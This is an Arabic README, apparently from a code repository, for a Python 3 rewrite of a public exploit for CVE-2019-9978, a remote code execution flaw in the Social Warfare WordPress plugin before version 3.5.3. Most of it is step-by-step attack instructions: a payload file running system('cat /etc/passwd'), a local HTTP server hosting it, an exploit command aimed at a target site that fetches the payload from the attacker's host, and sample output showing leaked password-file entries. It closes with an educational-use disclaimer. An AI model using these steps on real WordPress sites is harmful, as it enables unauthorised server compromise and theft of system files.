
ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في إضافة Social Warfare لنظام WordPress، تؤثر على الإصدارات الأقدم من 3.5.3.
ثغرة تنفيذ أوامر عن بعد (RCE) في إضافة Social Warfare لووردبريس، تؤثر على جميع الإصدارات الأقل من 3.5.3.
كان الاستغلال العام الأصلي مكتوبًا بإصدار قديم من بايثون ولم يعد يعمل بشكل صحيح في البيئات الحديثة.
أعدت كتابة الاستغلال ليكون متوافقًا تمامًا مع Python 3، مما يجعله أسهل في الاستخدام والفهم والتكامل مع الأدوات الحديثة.
أنشئ ملفًا باسم payload.txt بالمحتوى التالي:
<pre>system('cat /etc/passwd')</pre>
استخدم بايثون لخدمة حمولتك:
python3 -m http.server 8000
هذا سيجعل ملف payload.txt متاحًا على:
http://<your-ip>:8000/payload.txt
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
--payload-uri http://<your-ip>:8000/payload.txt
إذا كان الهدف ضعيفًا، فستتلقى مخرجات مشابهة لـ:
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...



🧬 إذا جعلتك هذه الحمولة سعيدًا، فإن نجمة ⭐ ستسعدني.
< 3.5.3⚠️ إخلاء مسؤولية: هذا المستودع مخصص للأغراض التعليمية والاختبار الأخلاقي فقط.
الاستخدام غير المصرح به لهذا الاستغلال ضد أنظمة لا تملكها ممنوع منعًا باتًا.